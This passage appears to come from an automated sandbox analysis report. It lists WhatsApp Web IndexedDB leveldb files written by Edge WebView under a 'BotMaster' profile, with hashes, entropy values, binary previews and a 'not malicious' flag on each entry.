                                                                                                                                                                                                                SHA-256:AE8CC6C3592D815265DEA4309F37608CEABAA7D0C7073768BC60572F8DBCB56B
                                                                                                                                                                                                                SHA-512:6B30309B8C2BA7AC5CD9A75BC9D6773FE901BCB4EFDFAE4401FF5BCD8FED2633DCFF4C989416804E7453072FB9490E55300D196D6EE70A66A052DC9319CC793E
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:. ............$.....................,.........2...3(.....................................&...........6.....D.........o...............4...................................l.......j.e...q...h.t.t.p.s._.w.e.b...w.h.a.t.s.a.p.p...c.o.m._.0.@.1..l.r.u.-.m.e.d.i.a.-.s.t.o.r.a.g.e.-.i.d.b....................................2.......+...Z.......X.S.1...$..o.f.f.d.:.............n.........)h.......%...X.......V.Q.....q.p.lF....2.....l................'.%...^..$....\.W..(..s.i.g.n.aN....2...".r........!........./.%...F..,....D.?.....s.w...2...*.Z....a2....)@.....7.%...X..4.....\w.a.w.c._.d.b._.e.n.c...2...2.l................E.%.....^!-.2..$...B.$...(w.o.r.k.e.rF....2...@.r....)a!h..G......12...C..........7.$.......A`$..........a.(.......2...!<..0l.o.g.s..........<...l.i.n.e........!l....................b.).. .. .........................4.....m.....5..4.........2...6...i...7.......8.....\...[...!.v.:.....v.;..........f..4.l.1.0.n.....g......%..y...h.....i.....j.............l.......m..............u

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\IndexedDB\https_web.whatsapp.com_0.indexeddb.leveldb\000012.log

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):5163
                                                                                                                                                                                                                Entropy (8bit):4.2874759213454405
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:96:/vSlFbfU3cdSfierJnkgSN3TRCWhW6VOXVPpUXhHSSTAox:3S3Y3cJerRkbNNrc+ESTd
                                                                                                                                                                                                                MD5:16BCD982CA709503E9511D407A7D4FB0
                                                                                                                                                                                                                SHA1:510D202A97372C5A8C4D6ADECAFB22A0B9542180
                                                                                                                                                                                                                SHA-256:E925AD77D70687D5308BC9F57D28D6E0238FE0CD2782957D0B62045862317CD1
                                                                                                                                                                                                                SHA-512:0AB05E9AA0F6975FB07FF3588BCB7A92643BD6AF126DF4FF8D4211991256C121672EBC6370801C6EB8D41D6E1BECDE8983C4EA965B4AC8A87BF8D39AA5710A85
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:.A.;.........................W.......h.t.t.p.s._.w.e.b...w.h.a.t.s.a.p.p...c.o.m._.0.@.1..s.i.g.n.a.l.-.s.t.o.r.a.g.e....................1..rL......................F......2.(.....................2.(........................................................2....i.d.e.n.t.i.t.y.-.s.t.o.r.e......2........i.d.e.n.t.i.f.i.e.r......2..........2..........2..........2..........2..........2.....".......i.d.e.n.t.i.t.y.-.s.t.o.r.e........2.(.........................2.(..................2........2.(..................2........2.(..................2........2.(..................2........2.(..................2........2.(..................2........2.(..................2........2.(..................2........2.(.........&.$.".......i.d.e.n.t.i.t.y.-.s.t.o.r.e.jf...............................2..".s.i.g.n.a.l.-.m.e.t.a.-.s.t.o.r.e......2........k.e.y......2..........2..........2..........2..........2..........2.....(.......s.i.g.n.a.l.-.m.e.t.a.-.s.t.o.r.e........2.(............................2.(.........

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\IndexedDB\https_web.whatsapp.com_0.indexeddb.leveldb\000013.ldb

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):1583
                                                                                                                                                                                                                Entropy (8bit):6.456158301762568
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:48:/aSjL0yylTpi9xbC9PoR0rOefXrvvX1MTVP+:CSjLEQ9xOdrxXb/r
                                                                                                                                                                                                                MD5:B4E40D4FB78B68D1E5F226D6BE62D48D
                                                                                                                                                                                                                SHA1:5498FA4CA6025A6A8B82691F848096D08D10AC42
                                                                                                                                                                                                                SHA-256:A2D8B90D3FFD198C63E08065EC60383FE8290ECE50AECFED0191AD52595E0006
                                                                                                                                                                                                                SHA-512:CA53ACD0979C1A20C971B42EEC7AE50F4F6D93A7F8AD71C9EB88D2FEB8B11C7351E21F4A483A7BFC06C1E24F45B5E3CECC14087C071C452D283C49137962E764
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:..(.........M...$.....2.......... .r......R..........0 ......$.......&...6$...........4.......%...2...&....<...............<............................$ .!...|....". .......f.t.s._.h.m.a.c._.k.e.y.s.....{..m......0 2.......z.G.........y>.........x>........X.2......w>&........v>.........u>.........t>.........s.........$.........g.................f...........e>.......d>.......c>.........b>.......a>.......`>......._>.........^............S..1.........)..$Q!.....'..-....%,....... ..........;$...?......2..............T........%.w..:#....w.....w..:w...2..:w......w...w0.U....h.t.t.pE.0w.e.b...w.h.ae.pa.p.p...c.o.m._.0.@.1..w.a.w.a"0d.b._.e.n.c.N.f$.............................h.......T.........Q.......O.........P.......A..2...U..Q.......V..0....i.d.....W.........X......m.}.......Y...%...Z.........[...........2.\..........i..fC....j.......k...`...l.........m.m.............n.....o...E.......8.p.....$..j....q.(.....u...]........]...~...................o".key\K.. ...D0a..X.#.d..(-..a...>.Vm.G.X.

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\IndexedDB\https_web.whatsapp.com_0.indexeddb.leveldb\000014.ldb

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):9016
                                                                                                                                                                                                                Entropy (8bit):6.556743223778325
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:96:ds7eMMWTfXxLwqM7gQEdbN9RiZriCws22uP4qV+sP1VRwMSixEt7oFWP+qbJf4cm:dswDqu0bTRiZHws22lq91VGt7cjFXJJ/
                                                                                                                                                                                                                MD5:2132545E8A16C6143BB6F73F57D4864D
                                                                                                                                                                                                                SHA1:79CE5EB70FCD22B1E4ECB19B6C5686EE6CC8B623
                                                                                                                                                                                                                SHA-256:E349A3DF48715F198312F10B1E51553290DC91EBCE006E7063F01CFF36A47839
                                                                                                                                                                                                                SHA-512:BC6842633E9C7C40D182C31354EDB6F944488EDB9DD02977603076E34A9F32CB89EE80CC93DA3CF0C881E2B4A2851B685AB0583E1B89B999BCD7D27F6D4E0A62
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:. ............$........M.............,.........2...3$..............................&...........6.....D... .r...$.....%...................X..............................%....#.....Z...2..$.....$..X.S...X...h.t.t.p.s._.w.e.b...w.h.a.t.s.a.p.p...c.o.m._.0.@.1..o.f.f.d.-.s.t.o.r.a.g.e................n..................%.....X.......V.Q.K.....q.p.lF...........l................'.%...^..$....\.W..(..s.i.g.n.aN....2...".r................/.%...F..,....D.?.....s.w...2...*.Z....I..........7.%...X..4.....\w.a.w.c._.d.b._.e.n.c...2...2.l................E.%...^..B.....(w.o.r.k.e.rF.......!..2..y..@.y....)Y!`...$ .....|.%.". ......fe.._.h.m.a%..u y.s.....{.0.....0 2.......z>.........y>.........x>.........w>.........v>.........u>.........t>.........s......%.$.........g.................f...........e>.......d>.......c>......AC..2.5....b>&......a>.......`>......._>.........^..A.$.........S..1.........$Q......!..-....%5....................?......2..............T........%.w..:#....w.....w..:w...2..:w...

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\IndexedDB\https_web.whatsapp.com_0.indexeddb.leveldb\000015.log

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):115
                                                                                                                                                                                                                Entropy (8bit):2.9794233552362535
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:zJLgXl/lfXn/sltSXk/9/lllx1ltXn+SRHFXn+SR0gyhKn:WXkXkk/flI0000gNn
                                                                                                                                                                                                                MD5:4EBCFAC9942E1643A36C35D3115E2F26
                                                                                                                                                                                                                SHA1:4443A63B69859C4DE4BCC803D87C10B87FA92DA8
                                                                                                                                                                                                                SHA-256:60ED76F2F5DC29A2BABBD250178F3F09637E9409A765C644E19E4FDE755A6147
                                                                                                                                                                                                                SHA-512:F38E2BB3FBC11367D027DFB076AD1A61718CDE359D6BDE5440466D0F7774FBE5F399F043D8E24435B254F20DF1B877E79708794482B30FAB963AE7BA444D4936
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:...v'..Q.................2.................2....\.>..S.................2.................2.........................

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\IndexedDB\https_web.whatsapp.com_0.indexeddb.leveldb\000016.ldb

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:PGP symmetric key encrypted data - Plaintext or unencrypted data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):2857
                                                                                                                                                                                                                Entropy (8bit):6.181685941757537
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:48:t+APCMaHVZt7Fg+MDflaYVRpMktC4/I3NvUXkA5nmKnL8:tNRa1Z7g+klaGcfzxUUumc8
                                                                                                                                                                                                                MD5:E35128D5D5357526BAC37497682C4548
                                                                                                                                                                                                                SHA1:08C0D95C9A7558DC03EF857BA9C9EE9FCD96E625
                                                                                                                                                                                                                SHA-256:AC09F413E7233828DFA3BD3986F39F8A40BA865DB7BB8F89760927E98697FF0E
                                                                                                                                                                                                                SHA-512:A46B2E0512DDE0318ED770B0054012E085D336284650CDCC2BC51B0F1786032A1E5B4A7F4854702EF721841C25F6B425F7DE11E4A94433FDDD8792AC971A6F15
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:. (.........?....................J.......G..$.....2...L......(.>........>........I ......+.H.$.C..2$.............K.$.............M........N......(.!...=...|0...d........<B.........;B.........:B..........2..o...9.'......o,2.......(..3....&.$......s.e.n.d.e.r.k.e.y.-.s.t.o.r.e.....2..a.....N.......1.K.........0>........./>..........>.........->.........,>.........+>.........*.........$............5...%.....B..!.....B..!.....B............5~..!~...$!F=......)..". ......b.a%..KJ.......01r..!.....>..!.....>..!.....>..!.....>..!.....>..!.....>..!.....>..!.......=.....0.........,%.@..s.i.g.n.e.d.-.pA.R.......<1...!.....i...!.....>..!.....>..!.....>.......:......>&.!.....>..!.....>..!.......=.....$.....].a..s%!.o.n:.......01...!.....>..!.....>..!.....>..!.....>..A.....>..!.....>..!.....>..!.......=....."....... ..E...j.............F......>&.!.....>..!.....>..!.....>..!.....>..!.....>..!.....>..!.......=.....,.......*.(%...E.a(0a.l.-.m.e.t.a:.......81...A.....>..!.....>..!.....>..!.....>..!.....

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\IndexedDB\https_web.whatsapp.com_0.indexeddb.leveldb\000017.ldb

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):11192
                                                                                                                                                                                                                Entropy (8bit):6.599228493081767
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:192:GVSQ1JD9ClDwEmXzwFugZmeb42i5qiOu2uOZxENnU6fHl8DqolaXVujlDp1M:GVSQfWDwEmDeugUiBiqiOuOKJHl8xleT
                                                                                                                                                                                                                MD5:1F1988457956A18A62D5E5905E8E1253
                                                                                                                                                                                                                SHA1:830C84029651AAA656D0523C13C2BF9B9354793C
                                                                                                                                                                                                                SHA-256:B718429C242FEC8F3C5C84EF8C16B4A5A69C1291F3F66D9AFF5F5E83C41B527F
                                                                                                                                                                                                                SHA-512:AA8BBA32ABCA10BA2609449E7429B32F89041C5F64768663D8300890E494883F4882071F2D83FC86F40A71ACC72B47F1EBD49530FC1AEB2AD228FF928B6517D3
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:. ............$........?.............,.........2...3(............"............&...........6.....D... .r...$.....%.....(.>......+.H.................0.....................2............+....J....X.......V.Q.1.R...h.t.t.p.s._.w.e.b...w.h.a.t.s.a.p.p...c.o.m._.0.@.1..q.p.l.-.s.t.o.r.a.g.e...........l....(..............'.%...^..$....\.W.....(..s.i.g.n.aN....2...".r........!R......../.%...F..,....D.?.....s.w...2...*.Z....)...)@.....7.%...X..4.....\w.a.w.c._.d.b._.e.n.c...2...2.l................E.%...^..B.....(w.o.r.k.e.rF....2...@.r....)R!Y...$ .....|.%.". ......fe.._.h.m.a%..n.y.s......2..?...{.?.....? 2.......z>.........y>.........x>.........w>.........v>.........u>.........t>.........s......%.$.........g....................f...........e>.......d>.......c>.......b>.......a>....F.....`>&......_>.........^..A.....,....S..1.........$Q*.....!..-....%5.................e..?......2.............T........%.w..:#....w.....w..:w...2..:w......w...w..(.w...=.GH.........d........<B.........;B.........

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\IndexedDB\https_web.whatsapp.com_0.indexeddb.leveldb\000018.log

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):115
                                                                                                                                                                                                                Entropy (8bit):3.003378898733327
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:wl7g1/lfXn+MllSXk+lUl/x1ltXn5/R+FXn5/RRgml1g:buMllkkC8b+Rgmlq
                                                                                                                                                                                                                MD5:C9E2FBCABB7D6CC231C7CFA855472E80
                                                                                                                                                                                                                SHA1:A42F1F5E1457E6F281A0E90440183592D96C1A73
                                                                                                                                                                                                                SHA-256:61256B09774A49091183AAA12D760A940E33183B5E597EC492DC3A9B40CFC971
                                                                                                                                                                                                                SHA-512:FC2277B87B4383864F36ED5E972AEED4862F666327B13F58EC2C74E33E8EB6840ACC84E04B1F959578665B0959F2D06D109879BF01C733DF702DD105E5D2D1C2
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:..A.'..W.................2.................2..L[..>..Y.................2.................2.........................

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\IndexedDB\https_web.whatsapp.com_0.indexeddb.leveldb\000019.ldb

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):249
                                                                                                                                                                                                                Entropy (8bit):4.4840144549272525
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:6:UlDkjlRprtMgGl9WDWl2aBLJnUIR8/AXsEfl3OslSDkP:UiRBGgGlE2nBG5/AcEN3OslSD4
                                                                                                                                                                                                                MD5:2E9B07090CED776FE4D3B527C56C151F
                                                                                                                                                                                                                SHA1:3AB4D26ABD18D34735CB6A31E74DC87FDEE363D5
                                                                                                                                                                                                                SHA-256:C6B1BD4571B0DA0F3589615AC093A3082807C7D3F96E3876D7D9189C5F9F0B2D
                                                                                                                                                                                                                SHA-512:AB1ED5721636F2146A25BC80BB01B6D9CFB8CD125B6F9630A735982AD055630D74AE9AAFB59BD76ACB974FFF07C96358872EEF8D6B10511D5CEA31441EAA8A08
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:l.......2...R................Q...............S........T.. ........U..L.....V................BJ|L..PQ..q...........A...".filter.leveldb.BuiltinBloomFilter2_.............\.........V.......Z.............v/......................................W...$uG.

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\IndexedDB\https_web.whatsapp.com_0.indexeddb.leveldb\000020.ldb

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):11146
                                                                                                                                                                                                                Entropy (8bit):6.587718397746283
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:192:hlPxI86DSlleMFE0Ov9qN2bHJtYxg5irqsu2uOZxENn16fHlDD7RXmujlD9U2A:hlPxLE049g2bpSxGwqsuOKkHlDRPU2A
                                                                                                                                                                                                                MD5:A77542A6C1FF3954A406F0A50D8B95D8
                                                                                                                                                                                                                SHA1:161090F8FFCE319F2EA67BB4614D4DB72A2504C3
                                                                                                                                                                                                                SHA-256:30B4D40916CB70477D95AA9F1B2658DD543AD5C6E0E030FFAC0609C52E0EDD42
                                                                                                                                                                                                                SHA-512:64F35024EBB03571ED7872DB1A85C4A89F7E910A77B5DFB7EC774DD65277F45CBB19139CF829C2E772ECA60E4B7ACF19F02A22ECDEACD932F2A9641DABB65EF8
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:. ............$........?.............,.........2...3(............"......&...........6.....D... .r...$.....%.....(.>......+.H.................X............................'.%....D....^...2..$...$.$..\.W...X...h.t.t.p.s._.w.e.b...w.h.a.t.s.a.p.p...c.o.m._.0.@.1..s.i.g.n.a.l.-.s.t.o.r.a.g.e.........".r................/.%.....F..,....D.?........s.w...2...*.Z....)O.........7.%...X..4....V.Q..d..w.a.w.c._.d.b._.e.n.c...2...2.l................E.%...^..B.....,w.o.r.k.e.r.B....2...@.r....)R!Y...$ .....|.%.". ......fEe._.h.m.a%..n y.s.....{.0.....0 2.......z>.........y>.........x>......!N..2......w>&........v>.........u>.........t>.........s......%.$.........g.................f...........e>.......d>.......c>.........b>.......a>.......`>......._>.........^..A.$.........S..1.........aB.2.$Q!.....'..-....%,....................?......2..............T........%.w..:#....w.....w..:w...2..:w......w...w..(.w...=..,.........d..!-...<B.........;B.........:B.........9....8...2.......(..3....&.$......s...d

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\IndexedDB\https_web.whatsapp.com_0.indexeddb.leveldb\000021.log

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):115
                                                                                                                                                                                                                Entropy (8bit):2.9694646854299345
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:F0g1l/lfXn5zXk5Ihutlllx1ltXn4AjFXn4AQgHhOAn:mg1k5IcXlOA2AQgBOA
                                                                                                                                                                                                                MD5:421B55451D9AA7AA084AB28B08AB29F9
                                                                                                                                                                                                                SHA1:3D26D31F60D5D1DE2D4D5AE28C011B4C09AC4F43
                                                                                                                                                                                                                SHA-256:A2A5FA900D376790B68256DF948A156F84CEC277B1C148429B724DA2B02FAF53
                                                                                                                                                                                                                SHA-512:7DA6908503FB72B75A9BBD956F97041AF4BF4D1857C53C550A59230B556E00051F5956BC5BFF413D620B7CBE3F0B9E08951AEE4E186640F2D3F0B0CADF5EA3D6
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:R`b2'..].................2.................2......>.._.................2.................2.........................

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\IndexedDB\https_web.whatsapp.com_0.indexeddb.leveldb\000022.ldb

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):251
                                                                                                                                                                                                                Entropy (8bit):4.427450762384072
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:6:UlDHjlxrvw2gl1SGl/10NLYl3gLJnUIR8/AXqiM4Zl/dXH:U5/Y9Sy/+NLYl3gG5/AhM4b/dXH
                                                                                                                                                                                                                MD5:47ECE116F091738BECE908C65DF9FF27
                                                                                                                                                                                                                SHA1:352DE28C1589C26C4A02A13D38DB985E3D114AC2
                                                                                                                                                                                                                SHA-256:9D2F6DD2A4A1E5CCE5CA9AEDF8E186C59B21C63F0A5F789ABFD8B589D7CC4386
                                                                                                                                                                                                                SHA-512:0E2EF94204C5188FCBB20E9CD63B350DBB1E2856F0BD6D1DDD9EE4E60FA5247955C92A46B55D1B01A752E81B2F333565E74C0841F38D99DDC12360092186267F
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:l.......2...X................W...............Y..........Z.. ........[..L.....\................o.:I.....*.................".filter.leveldb.BuiltinBloomFilter2a............L.........\.......\.........+I.Yx/......................................W...$uG.

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\IndexedDB\https_web.whatsapp.com_0.indexeddb.leveldb\000023.ldb

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):10940
                                                                                                                                                                                                                Entropy (8bit):6.610834677410304
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:192:vfvZxNHCX6DYZ+G1FFWHEkmzogHbah42i5q5tZhSVpEfHlqiDj23uX02ox1dlRPs:vfvZxEa+FFdkmPHbahBiq5zBHlbgSl4U
                                                                                                                                                                                                                MD5:63F3102E9272F860969D53D2F78676B3
                                                                                                                                                                                                                SHA1:BBBC634C9BADDA513DB9C8CA15D56AF187101F15
                                                                                                                                                                                                                SHA-256:BAEC3B517D1621E2BB6C128ADE724B2A647C6F4E1B7C59666E5FEAD5D6A587B6
                                                                                                                                                                                                                SHA-512:27C02B54161CEE1D6AD43AA9CDCDCABCD66F0018C3EBA7CDEDEBB2BC9A42176812A797D22056CFDA37C198340C7D6F4057DB1DC0CEDDEBCDB7890050B4B1345D
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:. ............$........?.............,.........2...3(.........&.."............6.....D... .r...$.....%.....(.>......+.H.........{...."..X............................/.%....D....F..,....D.?...I...h.t.t.p.s._.w.e.b...w.h.a.t.s.a.p.p...c.o.m._.0.@.1..s.w..........2.........*.a...............7.%...X..4....V.Q.J..p..w.a.w.c._.d.b._.e.n.c......9A.2.l................E.%...^..B....\.W..H..w.o.r.k.e.r.-.s.t...a.g.e...2...@.r....)R!Y...$ .....|.%.". ......f%.._.h.m.a%..n y.s.....{.0.....0 2.......z>.........y>.........x>.........w>.........v>.........u>.........t>......!...2......s.&....%.$.........g.................f...........e>.......d>.......c>.......b>.......a>.......`>......._>.........^..A....a.....S..1.........$Q......!..-....%&....................?......2..............T........a..2.%.}..:)....}.....}..:}...2..:}......}...}....(.w...=..H.........d........<B.........;B.........:B.........9....8...2.......(..3....&.$......s...de.i.y..e.....2.4A..NA....1>..A....0>..A..../>..A.....>..A....-

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\IndexedDB\https_web.whatsapp.com_0.indexeddb.leveldb\000024.log

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):115
                                                                                                                                                                                                                Entropy (8bit):3.0347670767719075
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:6GGg///lfXn4slAXk4qzex1ltXn7S9FXn7Sqgrleg:6GP/aslykFgx/
                                                                                                                                                                                                                MD5:09BF9E864EAF7D73F293D51152614479
                                                                                                                                                                                                                SHA1:89B175AD7B1C64CA5E74F8E1D53CA9AD14FADFC2
                                                                                                                                                                                                                SHA-256:A0F289D461A4338AEC2471F422721AD97034F99FBD7619692627C4C0D4597EFD
                                                                                                                                                                                                                SHA-512:F62C35BA410E2A1F8B86F8BB6818CC90C0419679A680DE863086252CFC0191E36ED6C9CF2A6AE63A6F01F3FC428E54F86C01AE497ED97F15095DFF0724EE7D5B
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:Qf..'..c.................2.................2.....H>..e.................2.................2.........................

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\IndexedDB\https_web.whatsapp.com_0.indexeddb.leveldb\000025.ldb

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):249
                                                                                                                                                                                                                Entropy (8bit):4.380566026082351
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:6:UlD/kvHXSlx2ggtl9gmlmMLJnUIR8/AXsEflFlAlSf:UevHilx3gtlCmlmMG5/AcENFlAlSf
                                                                                                                                                                                                                MD5:AA9AE2763ECD11540FBC4F9C62321EE8
                                                                                                                                                                                                                SHA1:7986E9BD276C332EA8CC2436957663A6C8D9226A
                                                                                                                                                                                                                SHA-256:3736E4D43F9FD31A7344537CE1CEB6568D1865EB1D83CEA8EA69DB034789E5BB
                                                                                                                                                                                                                SHA-512:1FBD88DFC40D4ABA3BF4AB303F7206F098037D142BDC17E4176C2C66BB81F5D023A5BFAB50A8473E776E5CCDA7C708730C7BE7672F02BB9848FA50CD62A860D3
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:l.......2...^................]..............._........`.. ........a..L.....b...............E........."...............J.".filter.leveldb.BuiltinBloomFilter2_.............\.........b.......Z.........[P.)v/......................................W...$uG.

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\IndexedDB\https_web.whatsapp.com_0.indexeddb.leveldb\000026.ldb

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):10833
                                                                                                                                                                                                                Entropy (8bit):6.637424594527684
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:192:10O2KOJ5ayqGqMT4dXgD79422lqItJOyZ/A39smHlJgGlgOLXcDirCEySg:1x29kHjMgXgD5BqqI5YlJRdru
                                                                                                                                                                                                                MD5:E982BADBEA095E298A1783E3E2213E53
                                                                                                                                                                                                                SHA1:C6FC3922182B10CFE76544CF196F55AF2A5EFB92
                                                                                                                                                                                                                SHA-256:DC7F66A3E4B3FA21A43C2044ECFCBC4FFE39B8A433B456B768B60FBC3E0CC0D2
                                                                                                                                                                                                                SHA-512:4248837DD0E3333AD53D4FFC4C4FE759491E09AD8CF33D04AA4CAE02AF25FB243EDE7EE73F962B56FAD6B1C97916099EF3EFF04FCD068846C585CD5BCC723910
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:. ............$........?.............,.........2...3(............"......6.....D... .r...$.....%.....(.>.v....+.H.........o....*..X............................7.%....D....X..4....V.Q...R...h.t.t.p.s._.w.e.b...w.h.a.t.s.a.p.p...c.o.m._.0.@.1..w.a.w.c._.d.b._.e.n.c.........2.l....$.............2.....E.+...^..B....\.W.1..H..w.o.r.k.e.r.-.s.t...a.g.e...2...@.r....)X!_...$ .....|.%.". ......f%+._.h.m.a%..n y.s.....{.0.....0 2.......z>.........y>.........x>.........w>.........v>.........u>.........t>.........s......%.$.........g.................f...........e>......A...2.5[...d>&......c>.......b>.......a>.......`>......._>.........^..A....a=....S..1.........$Q......!..-....%5.................L..?......2...i..........T........%.w..:#....w.....w..:w...2..:w......w...w...e..2.(.}...=.^H.........d........<B.........;B.........:B.........9....8...2.......(..3....&.$......s...de.i.y..e.....2.4A..NA....1>..a....0>..A..../>..A.....>..A....->..A....,>..A....+>..a....*..E{...a...........5~....F......B'

